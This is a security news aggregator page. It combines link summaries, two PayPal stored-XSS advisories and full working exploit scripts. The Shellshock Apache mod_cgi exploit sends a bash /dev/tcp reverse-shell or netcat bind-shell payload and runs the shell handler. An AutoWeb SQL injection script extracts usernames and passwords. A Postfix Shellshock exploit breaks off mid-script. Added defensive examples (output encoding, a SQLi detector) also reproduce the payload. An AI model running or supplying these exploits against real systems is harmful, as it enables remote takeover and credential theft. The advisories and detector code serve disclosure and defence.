Channel: BOT24

The art of disrespecting AV (and other old-school controls), Part 2

In December 2013 I posted about ‘The art of disrespecting AV (and other old-school controls)‘. I saw people retweeting it at that time and was quite happy that it generated some small feedback. It was meant to stimulate some discussion, but also be a reflection on security controls in general – it’s sometimes good to just step back and think a bit more on what they are and how to use them properly.

more here..........http://www.hexacorn.com/blog/2014/10/05/the-art-of-disrespecting-av-and-other-old-school-controls-part-2/

mysql_forensics

Due to my Master Thesis I developed some scripts to analyse mysql-database systems.

more here.........https://github.com/KasperFridolin/mysql_forensics

x509test

x509test is a piece of software written in Python 3 that tests the x509 certificate verification process of a target SSL/TLS client. The inspiration for this software comes from multiple reports on the insecurity of SSL/TLS clients due to incorrect verification of the x509 certificate chain. This phenomenon has many causes, one of which is the lack of negative feedback when invalid certificates are over-accepted. This software is an attempt to increase the security of client-side SSL/TLS software by providing negative feedback to its developers.

more here..........https://github.com/yymax/x509test

PayPal Inc Bug Bounty #53 - Multiple Persistent Vulnerabilities

Document Title:
===============
PayPal Inc Bug Bounty #53 - Multiple Persistent Vulnerabilities


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=835


Release Date:
=============
2014-09-29


Vulnerability Laboratory ID (VL-ID):
====================================
835


Common Vulnerability Scoring System:
====================================
4.3


Product & Service Introduction:
===============================
PayPal is a global e-commerce business allowing payments and money transfers to be made through the Internet. Online money
transfers serve as electronic alternatives to paying with traditional paper methods, such as checks and money orders. Originally,
a PayPal account could be funded with an electronic debit from a bank account or by a credit card at the payer's choice. But some
time in 2010 or early 2011, PayPal began to require a verified bank account after the account holder exceeded a predetermined
spending limit. After that point, PayPal will attempt to take funds for a purchase from funding sources according to a specified
funding hierarchy. If you set one of the funding sources as Primary, it will default to that, within that level of the hierarchy
(for example, if your credit card ending in 4567 is set as the Primary over 1234, it will still attempt to pay money out of your
PayPal balance, before it attempts to charge your credit card). The funding hierarchy is a balance in the PayPal account; a
PayPal credit account, PayPal Extras, PayPal SmartConnect, PayPal Extras Master Card or Bill Me Later (if selected as primary
funding source) (It can bypass the Balance); a verified bank account; other funding sources, such as non-PayPal credit cards.
The recipient of a PayPal transfer can either request a check from PayPal, establish their own PayPal deposit account or request
a transfer to their bank account.

PayPal is an acquirer, performing payment processing for online vendors, auction sites, and other commercial users, for which it
charges a fee. It may also charge a fee for receiving money, proportional to the amount received. The fees depend on the currency
used, the payment option used, the country of the sender, the country of the recipient, the amount sent and the recipient's account
type. In addition, eBay purchases made by credit card through PayPal may incur extra fees if the buyer and seller use different currencies.

On October 3, 2002, PayPal became a wholly owned subsidiary of eBay. Its corporate headquarters are in San Jose, California, United
States at eBay's North First Street satellite office campus. The company also has significant operations in Omaha, Nebraska, Scottsdale,
Arizona, and Austin, Texas, in the United States, Chennai, Dublin, Kleinmachnow (near Berlin) and Tel Aviv. As of July 2007, across
Europe, PayPal also operates as a Luxembourg-based bank.

On March 17, 2010, PayPal entered into an agreement with China UnionPay (CUP), China's bankcard association, to allow Chinese consumers
to use PayPal to shop online. PayPal is planning to expand its workforce in Asia to 2,000 by the end of the year 2010.
Between December 4–9, 2010, PayPal services were attacked in a series of denial-of-service attacks organized by Anonymous in retaliation
for PayPal's decision to freeze the account of WikiLeaks citing terms of use violations over the publication of leaked US diplomatic cables.

(Copy of the Homepage: www.paypal.com) [http://en.wikipedia.org/wiki/PayPal]


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered two persistent input validation web vulnerabilities in the official PayPal Inc GP+ online service web-application.


Vulnerability Disclosure Timeline:
==================================
2014-09-29:     Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
PayPal Inc
Product: GP+ - Application Service 2013 Q1


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
Multiple persistent input validation web vulnerabilities have been discovered in the official PayPal Inc GP+ online service web-application.
The vulnerabilities allow an attacker to inject their own malicious script code on the application side (persistent) of the vulnerable module.

The persistent input validation vulnerabilities are located in the `New page title Add` and `Create a new META-description` input values of the
`Improvement-Plan` module. Remote attackers are able to inject their own persistent script code by generating the search-engine-content list.
The attack vector is persistent on the application side of the vulnerable service and the request method used to inject the code is POST.

To exploit the persistent bugs the attacker needs to bypass the validation of the meta tag and page title input fields in 2 different ways.

Page Title Input Bypass
In the first example method the attacker can use %20``> to split the request and close the tag with < >. Everything after the closed
ending tag executes the code. At the end the example should look like ... %20``>+[Random Context]+< >[PERSISTENT INJECTED SCRIPT CODE!]

Meta Tag Bypass
In the second example method the attacker needs to satisfy the meta tag word validation by including any random word. After the random
word he includes ><> to close the mask, then opens a new one with ``< (note: meta tags are split with ,) and can execute his own script code
after the ``<   ``>. At the end the example should look like ... [Random Word as TAG], ><>``<   ``>< ``><[PERSISTENT INJECTED SCRIPT CODE!]<

The security risk of the persistent web vulnerabilities is estimated as medium with a CVSS (common vulnerability scoring system) score of 4.3.
Exploitation of the application-side web vulnerabilities requires a low-privileged web-application user account and only low user interaction.
Successful exploitation of the vulnerabilities results in persistent phishing mails, session hijacking, persistent external redirects to malicious
sources and application-side manipulation of affected or connected module context.

Request Method(s):
                                [+] POST

Vulnerable Service(s):
                                [+] Paypal Inc - GP+

Vulnerable Module(s):
                                [+] Improvement-Plan > Create a new page title

Vulnerable Parameter(s):
                                [+] New page title Add (name)
                                [+] Create a new META-description (tag)

Affected Module(s):
                                [+] Preview Improve Page - Listing
                                [+] Meta Tag - Listing


Proof of Concept (PoC):
=======================
The vulnerabilities can be exploited by remote attackers with a low-privileged application user account and low or medium
required user interaction. For demonstration or to reproduce ...

PoC:
%20">< >"<[PERSISTENT INJECTED SCRIPT CODE!]<
... or
PENTEST INJECTED SCRIPT CODE ><>"<">< "><[PERSISTENT INJECTED SCRIPT CODE!]<


Review: Preview improve page - Listing

Module:         Create a new page title > New page title Add
Affected:       Preview improve page - Listing

<div id="preview-seo-improvement-plan">
<div id="search-engine-content">
<a id="heading" href="#">a</a>
<p>%20">%20">><<<[PERSISTENT INJECTED SCRIPT CODE!]) <</iframe></p>
<a href="#">http://maja.com/impressum.php</a> - <span>in cache</span>
</div></div>



Review: Meta TAG - Listing

Module:         Create a new page title > Create a new META-description
Affected:       Meta TAG - Listing

<div id="notifier">
<p class="notifier-heading">Improve page <input id="page-number" name="page" value="0"> of 1</p>
<p class="notifier-text">Each page should have unique title and META description. Create a title that describes
in a few words what can be found on this page. The META description is used in the search results. Describe in 1
or 2 short sentences what this page is about.</p></div>

<div id="preview-seo-improvement-plan">
<div id="search-engine-content">
<a id="heading" href="#">MaJa - Ihr Partner in Fragen Webdesign, Webhosting, Webpromotion, Prasentationen...</a>
<p>hello, merlin, [PENTEST INJECTED SCRIPT CODE!]+ben><>"<
">><>"<</iframe></p>
<a href="#">http://www.vulnerability-lab.com/[o_O]</a> - <span>in cache</span>
</div></div>


Reference(s):
                https://www.paypal-gpplus.com/en/dashboard/improvement-plan/2729702/step2/


Solution - Fix & Patch:
=======================
The vulnerability can be patched by parsing the web context of the Create a new META-description and New page title Add input fields.
Do not forget to separately parse the vulnerable output listing of the vulnerable values to fix the issue.


Security Risk:
==============
The security risk of the persistent input validation vulnerabilities and the filter bypass method is estimated as medium. (CVSS 4.3)


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either
expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers
are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even
if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation
of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break
any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com           - www.vuln-lab.com                                      - www.evolution-sec.com
Contact:    admin@vulnerability-lab.com         - research@vulnerability-lab.com                        - admin@evolution-sec.com
Section:    dev.vulnerability-db.com            - forum.vulnerability-db.com                            - magazine.vulnerability-db.com
Social:     twitter.com/#!/vuln_lab             - facebook.com/VulnerabilityLab                         - youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php   - vulnerability-lab.com/rss/rss_upcoming.php            - vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php    - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

                                Copyright © 2014 | Vulnerability Laboratory [Evolution Security]

Paypal Inc Bug Bounty #30 - Filter Bypass & Persistent Vulnerabilities

Document Title:
===============
Paypal Inc Bug Bounty #30 - Filter Bypass & Persistent Vulnerabilities


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=705


Release Date:
=============
2014-09-26


Vulnerability Laboratory ID (VL-ID):
====================================
705


Common Vulnerability Scoring System:
====================================
4.3


Product & Service Introduction:
===============================
PayPal is a global e-commerce business allowing payments and money transfers to be made through the Internet. Online money
transfers serve as electronic alternatives to paying with traditional paper methods, such as checks and money orders. Originally,
a PayPal account could be funded with an electronic debit from a bank account or by a credit card at the payer's choice. But some
time in 2010 or early 2011, PayPal began to require a verified bank account after the account holder exceeded a predetermined
spending limit. After that point, PayPal will attempt to take funds for a purchase from funding sources according to a specified
funding hierarchy. If you set one of the funding sources as Primary, it will default to that, within that level of the hierarchy
(for example, if your credit card ending in 4567 is set as the Primary over 1234, it will still attempt to pay money out of your
PayPal balance, before it attempts to charge your credit card). The funding hierarchy is a balance in the PayPal account; a
PayPal credit account, PayPal Extras, PayPal SmartConnect, PayPal Extras Master Card or Bill Me Later (if selected as primary
funding source) (It can bypass the Balance); a verified bank account; other funding sources, such as non-PayPal credit cards.
The recipient of a PayPal transfer can either request a check from PayPal, establish their own PayPal deposit account or request
a transfer to their bank account.

PayPal is an acquirer, performing payment processing for online vendors, auction sites, and other commercial users, for which it
charges a fee. It may also charge a fee for receiving money, proportional to the amount received. The fees depend on the currency
used, the payment option used, the country of the sender, the country of the recipient, the amount sent and the recipient's account
type. In addition, eBay purchases made by credit card through PayPal may incur extra fees if the buyer and seller use different currencies.

On October 3, 2002, PayPal became a wholly owned subsidiary of eBay. Its corporate headquarters are in San Jose, California, United
States at eBay's North First Street satellite office campus. The company also has significant operations in Omaha, Nebraska, Scottsdale,
Arizona, and Austin, Texas, in the United States, Chennai, Dublin, Kleinmachnow (near Berlin) and Tel Aviv. As of July 2007, across
Europe, PayPal also operates as a Luxembourg-based bank.

On March 17, 2010, PayPal entered into an agreement with China UnionPay (CUP), China's bankcard association, to allow Chinese consumers
to use PayPal to shop online. PayPal is planning to expand its workforce in Asia to 2,000 by the end of the year 2010.
Between December 4–9, 2010, PayPal services were attacked in a series of denial-of-service attacks organized by Anonymous in retaliation
for PayPal's decision to freeze the account of WikiLeaks citing terms of use violations over the publication of leaked US diplomatic cables.

(Copy of the Homepage: www.paypal.com) [http://en.wikipedia.org/wiki/PayPal]


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple web vulnerabilities in the official PayPal Here mobile notify me online service web-application.


Vulnerability Disclosure Timeline:
==================================
2014-09-26:     Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================

Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
2 persistent POST inject vulnerabilities have been discovered in the official PayPal Here mobile Notify Me online service web-application.
The vulnerabilities allow remote attackers to inject their own malicious script code on the application side of the vulnerable web function.

The first 2 vulnerabilities are located in the `first_name` and `last_name` values of the `Notify Me` online service web-application.
Remote attackers are able to inject their own malicious script code into the firstname and lastname values of the Notify Me send POST method request.
The execution of the injected script code occurs in the `biz.paypal` notify mail that arrives after the successful POST method request to the
paypal api and web-application. The execution context is located in the mail header next to the introduction to the paypal customer.

An input filter validation bypass vulnerability has been discovered in the official PayPal Here mobile Notify Me online service web-application.
To inject the values the attacker needs to use a session tamper tool to interact with the request.

During the pentests the input fields disallowed the insertion of script code (firstname & lastname). We tried to manipulate the POST request, which
is not connected to the input validation of the form (after a first load), with our own malicious test values. The result was the successful execution of
the malicious test code in the paypal notify me service mail. The protection of the input was not connected to the session request, which results
in a successful bypass by manipulation of the POST values after the first web request.

The security risk of the persistent web vulnerabilities is estimated as medium with a CVSS (common vulnerability scoring system) score of 3.5.
Exploitation of the application-side web vulnerabilities requires no privileged web-application user account but low or medium user interaction.
Successful exploitation of the vulnerabilities results in persistent phishing mails, session hijacking, persistent external redirects to malicious
sources and application-side manipulation of affected or connected module context.

Request Method(s):
                                [+] POST

Vulnerable Module(s):
                                [+] PayPal Here - Notify Me

Vulnerable Input Field(s):
                                [+] Firstname
                                [+] Lastname

Vulnerable Parameter(s):
                                [+] first_name
                                [+] last_name

Affected Module(s):
                                [+] Notification Mail - You’re in line to get PayPal Here™


Proof of Concept (PoC):
=======================
The persistent vulnerability can be exploited by remote attackers without a privileged application user account and with low or medium user interaction.
For a security demonstration or to reproduce the security vulnerability, follow the provided information and steps below.

Manual steps to reproduce the application-side vulnerability ...

1. Open the paypal.com website and surf to the notify me service application site (https://www.paypal.com/webapps/mpp/credit-card-reader)
2. Enter your email and a random company name, firstname and lastname as usual (do not save to notify yet!)
3. Start a session tamper tool to manipulate the request after the first attempt
4. Change the vulnerable firstname and lastname values to your own script code payloads and continue to intercept the request
5. Open your mailbox and review the paypal inc notify me service mail that arrived from the website form
6. The persistent execution occurs in the header location next to the paypal customer introduction word `Dear [First-&Lastname]`
Note: The attacker is now able to manipulate the complete mail body and header of the notify me context to compromise other user accounts
7. Successful reproduction of the remote vulnerability!


PoC:  Notification Mail - Firstname & Lastname

<td style="font-family:verdana,sans-serif; font-size:13px; color:rgb(54, 54, 54);
text-align:left; "><div class="mktEditable" id="copy"><p><br><span style="font-family: arial,helvetica,sans-serif;
font-size: 12px;">Dear svenja "><[PERSISTENT INJECET SCRIPT CODE! FIRSTNAME & LASTNAME];)" <, <="" span=""></p>
<p><span style="font-family: arial,helvetica,sans-serif; font-size: 12px;">
Thank you for your interest in PayPal Here!  You are now a confirmed member of the PayPal Here “
Exclusive Release” wait list.
 PayPal Here will be available shortly and you will be notified with instructions on how to get your free mobile
card reader and access to the app through iTunes or the Android Market (Play).</span></p>
<p><span style="font-family: arial,helvetica,sans-serif; font-size: 12px;">PayPal Here will make a big difference to your business.
 Instead of chasing payments or missing out on sales, you’ll be able to plug the card reader into your smart
phone and get paid on the spot. </span></p>


--- PoC Session Logs [POST] ---
POST (Request): Standard
oid=00D300000000LaY
retURL=https%3A%2F%2Fwww.paypal.com%2Fwebapps%2Fmpp%2Fcredit-card-reader-thank-you
lead_source=Web-KNLBSTR
recordType=012800000003bgg
Campaign_ID=70180000000MGgf
email=bkm@evolution-sec.com
first_name=Benjamin
last_name=KunzMejri
mobile=01776713371337
url=http%3A%2F%2Fwww.vulnerability-lab.com
company=vulnerabilitylab
Additional_Services__c=Android

POST (Request): Manipulated
oid=00D300000000LaY
retURL=https%3A%2F%2Fwww.paypal.com%2Fwebapps%2Fmpp%2Fcredit-card-reader-thank-you
lead_source=Web-KNLBSTR
recordType=012800000003bgg
Campaign_ID=70180000000MGgf
email=bkm@evolution-sec.com
first_name=<[PERSISTENT INJECTED SCRIPT CODE! #1]>
last_name="><[PERSISTENT INJECTED SCRIPT CODE! #1]<
mobile=01776713371337
url=http%3A%2F%2Fwww.vulnerability-lab.com
company=vulnerabilitylab
Additional_Services__c=1337kungfu_0ne


Reference(s):
https://www.paypal.com/webapps/mpp/credit-card-reader
https://www.paypal.com/webapps/mpp/credit-card-reader-thank-you


Solution - Fix & Patch:
=======================
The vulnerability can be patched by securely encoding and parsing the firstname and lastname values in the notify me POST method request.
Restrict the notify me input fields and disallow special chars. Parse, in the outgoing mail context, the names that are stored in the
dbms to prevent further script code executions. Connect a token to the session to prepare exceptions that prevent malicious interaction.
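Both advisories above describe the same defect: a stored name, page title or META description is written into HTML (the GP+ search-engine-content listing and the Notify Me mail greeting) without output encoding, and the only validation sits in the browser form, so a replayed POST bypasses it. The following example, added here and not part of either advisory or of PayPal's code, shows the fix both advisories recommend in Python: an allow-list check in the POST handler plus html.escape at output time, checked against constructed strings modelled on the PoC values; the regex, templates and function names are hypothetical.

```python
import html
import re

# Constructed sample inputs (not taken from live traffic): a benign name
# followed by strings modelled on the two PoC values quoted in the advisories.
SAMPLE_NAMES = [
    "Benjamin",
    '%20">< >"<[PERSISTENT INJECTED SCRIPT CODE!]<',
    'PENTEST INJECTED SCRIPT CODE ><>"<">< "><[PERSISTENT INJECTED SCRIPT CODE!]<',
]

# Hypothetical allow-list for a name or company field: letters (ASCII and
# Latin-1/Latin Extended-A), digits, space, apostrophe, dot and hyphen,
# 1 to 80 characters. It lives in the POST handler, so replaying the request
# with a tamper tool after the form's client-side check changes nothing.
NAME_RE = re.compile(r"^[A-Za-z\u00C0-\u017F0-9][A-Za-z\u00C0-\u017F0-9 '.\-]{0,79}$")


def validate_name(value: str) -> bool:
    """Server-side input validation, independent of the HTML form."""
    return NAME_RE.fullmatch(value) is not None


def render_greeting_unescaped(first_name: str, last_name: str) -> str:
    """The vulnerable pattern: the stored name is concatenated into the mail
    HTML as-is, so a quote or angle bracket in it closes the <span>."""
    return f'<span style="font-size: 12px;">Dear {first_name} {last_name},</span>'


def render_greeting(first_name: str, last_name: str) -> str:
    """The same 'Dear [First-&Lastname]' line with output encoding.

    html.escape(quote=True) turns <, >, &, " and ' into entities, so the
    value is shown literally and can no longer break out of the markup.
    """
    full_name = html.escape(f"{first_name} {last_name}", quote=True)
    return f'<span style="font-size: 12px;">Dear {full_name},</span>'


def render_search_engine_content(title: str, description: str) -> str:
    """The GP+ preview listing: title and META description are encoded
    separately at the output stage, which is the advisory's second fix."""
    return (
        '<div id="search-engine-content">'
        f'<a id="heading" href="#">{html.escape(title, quote=True)}</a>'
        f"<p>{html.escape(description, quote=True)}</p>"
        "</div>"
    )


def output_is_encoded(render, *user_values) -> bool:
    """Regression check for a template: render it with empty values and with
    the user values; if the number of raw <, > or " grew, user markup leaked."""
    template = render(*("" for _ in user_values))
    rendered = render(*user_values)
    return all(rendered.count(ch) <= template.count(ch) for ch in '<>"')


def check_samples() -> dict:
    """Run both layers over the constructed samples; maps each value to
    (passes validation, greeting output is encoded)."""
    return {
        value: (validate_name(value), output_is_encoded(render_greeting, value, "Test"))
        for value in SAMPLE_NAMES
    }
```

The validation layer rejects the PoC strings outright, and the encoding layer keeps the markup intact even when validation is skipped, which is the defence in depth the advisory asks for.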


Security Risk:
==============
The security risk of the two persistent input validation vulnerabilities via POST method request is estimated as medium.
The security risk of the filter bypass vulnerability in the paypal inc notify me form is estimated as medium.


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]



Pwning the kernel && root

This time we'll discuss how to use the basic building block of the limited form of kernel-write we found last time in order to get unrestricted write to the kernel, and ultimately root privileges.

more here...........http://blog.nativeflow.com/pwning-the-kernel-root

Revisiting Android disk encryption

In iOS 8, Apple has expanded the scope of data encryption and now mixes in the user's passcode with an unextractable hardware UID when deriving an encryption key, making it harder to extract data from iOS 8 devices. This has been somewhat of a hot topic lately, with opinions ranging from praise for Apple's new focus on serious security, to demands for "golden keys" to mobile devices to be magically conjured up. Naturally, the debate has spread to other OS's, and Google has announced that the upcoming Android L release will also have disk encryption enabled by default. Consequently, questions and speculation about the usefulness and strength of Android's disk encryption have sprung up on multiple forums, so this seems like a good time to take another look at its implementation. While Android L still hasn't been released yet, some of the improvements to disk encryption it introduces are apparent in the preview release, so this post will briefly introduce them as well.

This post will focus on the security level of disk encryption

more here.............http://nelenkov.blogspot.com/2014/10/revisiting-android-disk-encryption.html

SOLDIER OF FORTRAN

On this site you will find the only known collection of mainframe hacking tools and links to mainframe hacking weblogs

more here............http://soldieroffortran.org/index.html

Apache mod_cgi - Remote Exploit (Shellshock)

#! /usr/bin/env python
from socket import *
from threading import Thread
import thread, time, httplib, urllib, sys

stop = False
proxyhost = ""
proxyport = 0

def usage():
    print """

        Shellshock apache mod_cgi remote exploit

Usage:
./exploit.py var=<value>

Vars:
rhost: victim host
rport: victim port for TCP shell binding
lhost: attacker host for TCP shell reversing
lport: attacker port for TCP shell reversing
pages:  specific cgi vulnerable pages (separated by comma)
proxy: host:port proxy

Payloads:
"reverse" (unix universal) TCP reverse shell (Requires: rhost, lhost, lport)
"bind" (uses non-bsd netcat) TCP bind shell (Requires: rhost, rport)

Example:

./exploit.py payload=reverse rhost=1.2.3.4 lhost=5.6.7.8 lport=1234
./exploit.py payload=bind rhost=1.2.3.4 rport=1234

Credits:

Federico Galatolo 2014
"""
    sys.exit(0)

def exploit(lhost,lport,rhost,rport,payload,pages):
    headers = {"Cookie": payload, "Referer": payload}
   
    for page in pages:
        if stop:
            return
        print "[-] Trying exploit on : "+page
        if proxyhost != "":
            c = httplib.HTTPConnection(proxyhost,proxyport)
            c.request("GET","http://"+rhost+page,headers=headers)
            res = c.getresponse()
        else:
            c = httplib.HTTPConnection(rhost)
            c.request("GET",page,headers=headers)
            res = c.getresponse()
        if res.status == 404:
            print "[*] 404 on : "+page
        time.sleep(1)
       

args = {}
   
for arg in sys.argv[1:]:
    ar = arg.split("=")
    args[ar[0]] = ar[1]
try:
    args['payload']
except:
    usage()
   
if args['payload'] == 'reverse':
    try:
        lhost = args['lhost']
        lport = int(args['lport'])
        rhost = args['rhost']
        payload = "() { :;}; /bin/bash -c /bin/bash -i >& /dev/tcp/"+lhost+"/"+str(lport)+" 0>&1 &"
    except:
        usage()
elif args['payload'] == 'bind':
    try:
        rhost = args['rhost']
        rport = args['rport']
        payload = "() { :;}; /bin/bash -c 'nc -l -p "+rport+" -e /bin/bash &'"
    except:
        usage()
else:
    print "[*] Unsupported payload"
    usage()
   
try:
    pages = args['pages'].split(",")
except:
    pages = ["/cgi-sys/entropysearch.cgi","/cgi-sys/defaultwebpage.cgi","/cgi-mod/index.cgi","/cgi-bin/test.cgi","/cgi-bin-sdb/printenv"]

try:
    proxyhost,proxyport = args['proxy'].split(":")
except:
    pass
           
if args['payload'] == 'reverse':
    serversocket = socket(AF_INET, SOCK_STREAM)
    buff = 1024
    addr = (lhost, lport)
    serversocket.bind(addr)
    serversocket.listen(10)
    print "[!] Started reverse shell handler"
    thread.start_new_thread(exploit,(lhost,lport,rhost,0,payload,pages,))
if args['payload'] == 'bind':
    serversocket = socket(AF_INET, SOCK_STREAM)
    addr = (rhost,int(rport))
    thread.start_new_thread(exploit,("",0,rhost,rport,payload,pages,))
   
buff = 1024
   
while True:
    if args['payload'] == 'reverse':
        clientsocket, clientaddr = serversocket.accept()
        print "[!] Successfully exploited"
        print "[!] Incoming connection from "+clientaddr[0]
        stop = True
        clientsocket.settimeout(3)
        while True:
            reply = raw_input(clientaddr[0]+"> ")
            clientsocket.sendall(reply+"\n")
            try:
                data = clientsocket.recv(buff)
                print data
            except:
                pass
       
    if args['payload'] == 'bind':
        try:
            serversocket = socket(AF_INET, SOCK_STREAM)
            time.sleep(1)
            serversocket.connect(addr)
            print "[!] Successfully exploited"
            print "[!] Connected to "+rhost
            stop = True
            serversocket.settimeout(3)
            while True:
                reply = raw_input(rhost+"> ")
                serversocket.sendall(reply+"\n")
                data = serversocket.recv(buff)
                print data
        except:
            pass



Authored by Federico Galatolo



//The information contained within this publication is
//supplied "as-is" with no warranties or guarantees of fitness
//of use or otherwise. Neither Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information

AutoWeb 3.0 - (noticias.php id_cat) SQL Injection Exploit

#!/usr/bin/env python
#-*- coding:utf-8 -*-
 
# Title        : AutoWeb v3.0 (noticias.php id_cat) SQL Injection Exploit
# Author       : ZoRLu / zorlu@milw00rm.com / submit@milw00rm.com
# Home         : http://milw00rm.com / its online
# Download     : http://www.multdivision.com.br
# Other Vuln.  : http://www.1337day.com/exploit/22697 / thks: Felipe Andrian Peixoto
# date         : 28/09/2014
# Python       : V 2.7
# Thks         : exploit-db.com, packetstormsecurity.com, securityfocus.com, sebug.net and others
   
import sys, urllib2, re, os, time
   
if len(sys.argv) < 2:
    os.system(['clear','cls'][1])
    print " ____________________________________________________________________"
    print "|                                                                    |"
    print "|   AutoWeb v3.0 (noticias.php id_cat) SQL Injection Exploit         |"
    print "|   ZoRLu / milw00rm.com                                             |"
    print "|   exploit.py http://site.com/path/                                 |"
    print "|____________________________________________________________________|"
    sys.exit(1)
 
koybasina = "http://"
koykicina = "/"
sitemiz = sys.argv[1]

if sitemiz[-1:] != koykicina:
    sitemiz += koykicina
     
if sitemiz[:7]  != koybasina:
    sitemiz =  koybasina + sitemiz
 
vulnfile = "noticias.php"
sql = "?id_cat=0x90+/*!12345union*/+/*!12345select*/+1,concat(0x3a3a3a,username,0x3a3a3a),concat(0x3b3b3b,senha,0x3b3b3b),4,5,6,7,8,9,10+/*!12345from*/+/*!12345user*/--"
url = sitemiz + vulnfile + sql
 
print "\nExploiting...\n"
 
try:
    veri = urllib2.urlopen(url).read()
    aliver = re.findall(r":::(.*)([0-9a-fA-F])(.*):::", veri)
    if len(aliver) > 0:
        print "username:  " + aliver[0][0] + aliver[0][1] +aliver[0][2]
    else:
        print "Exploit failed..."
         
 
except urllib2.HTTPError:
    print "Security!"

   
try:
    veri = urllib2.urlopen(url).read()
    aliver = re.findall(r";;;(.*)([0-9a-fA-F])(.*);;;", veri)
    if len(aliver) > 0:
        print "password:  " + aliver[0][0] + aliver[0][1] +aliver[0][2]
                 
        print "\nGood Job Bro!"
    else:
        print "Exploit failed..."
         
 
except urllib2.HTTPError:

    print "Security!"



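The payload in the AutoWeb script above hides UNION, SELECT and FROM inside MySQL versioned comments (`/*!12345union*/`), which the server executes as ordinary SQL but which a keyword filter that does not understand the syntax never sees. As an added example, not part of the original exploit or of the AutoWeb project, the Python 3 checker below decodes a request's query string, unwraps that obfuscation and reports which signatures each parameter triggers. The host name and the benign request are constructed for the example; the attack request reuses the page's own payload.

```python
import re
from typing import Dict, List
from urllib.parse import parse_qsl, urlsplit

# MySQL executes the body of a "versioned" comment /*!nnnnn ... */ when its
# version is at least nnnnn, so /*!12345union*/ is "union" to the server but
# looks like a comment to a filter that does not understand the syntax.
VERSIONED_COMMENT_RE = re.compile(r"/\*!\d{0,5}\s*(.*?)\s*\*/", re.S)
PLAIN_COMMENT_RE = re.compile(r"/\*.*?\*/", re.S)
LINE_COMMENT_RE = re.compile(r"(--|#).*$", re.S)


def normalize_sql_fragment(value: str) -> str:
    """Reduce a decoded parameter value to what MySQL would actually parse:
    versioned comments unwrapped, other comments removed, whitespace
    collapsed, lower-cased."""
    s = VERSIONED_COMMENT_RE.sub(r" \1 ", value)
    s = PLAIN_COMMENT_RE.sub(" ", s)
    s = LINE_COMMENT_RE.sub(" ", s)
    return re.sub(r"\s+", " ", s).strip().lower()


# (name, pattern, whether it is checked on the raw decoded value rather than
# on the normalized one). Only the first needs the raw text: the comment
# wrapper itself is the signal, and normalization removes it.
SIGNATURES = [
    ("versioned_comment", re.compile(r"/\*!\d*"), True),
    ("union_select", re.compile(r"\bunion\b.*\bselect\b", re.S), False),
    ("concat_call", re.compile(r"\bconcat\s*\("), False),
    ("hex_literal", re.compile(r"\b0x[0-9a-f]{2,}\b"), False),
]


def classify_value(value: str) -> List[str]:
    """Names of the signatures a single decoded parameter value triggers."""
    normalized = normalize_sql_fragment(value)
    return [name for name, pattern, on_raw in SIGNATURES
            if pattern.search(value if on_raw else normalized)]


def inspect_request(url: str) -> Dict[str, List[str]]:
    """Map each query parameter that triggers at least one signature to the
    list of signatures it triggers. parse_qsl undoes %xx escapes and '+'."""
    findings: Dict[str, List[str]] = {}
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        names = classify_value(value)
        if names:
            findings[name] = names
    return findings


# Constructed request: the payload the script above sends, against a
# placeholder host.
SAMPLE_ATTACK = ("http://www.example.test/path/noticias.php"
                 "?id_cat=0x90+/*!12345union*/+/*!12345select*/+1,"
                 "concat(0x3a3a3a,username,0x3a3a3a),"
                 "concat(0x3b3b3b,senha,0x3b3b3b),4,5,6,7,8,9,10"
                 "+/*!12345from*/+/*!12345user*/--")

# Constructed ordinary request to the same page.
SAMPLE_BENIGN = "http://www.example.test/path/noticias.php?id_cat=7&page=2"

if __name__ == "__main__":
    print(inspect_request(SAMPLE_ATTACK))   # id_cat triggers all four signatures
    print(inspect_request(SAMPLE_BENIGN))   # {}
```

The normalization step is what matters: run the same signatures over the raw query string and `union_select` never fires, because the keywords only exist inside the comment wrappers. The hex-literal rule is a weak signal on its own (a value of `0x90` is unusual but not an attack); it is listed so a triage view shows how much of the payload's structure survives decoding.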

Postfix SMTP - Shellshock Exploit

#!/bin/python
# Exploit Title:  Shellshock SMTP Exploit
# Date: 10/3/2014
# Exploit Author: fattymcwopr (Phil Blank)
# Vendor Homepage: gnu.org
# Software Link: http://ftp.gnu.org/gnu/bash/
# Version: 4.2.x < 4.2.48
# Tested on: Debian 7 (postfix smtp server w/procmail)
# CVE : 2014-6271

from socket import *
import sys

def usage():
    print "shellshock_smtp.py <target> <command>"

argc = len(sys.argv)
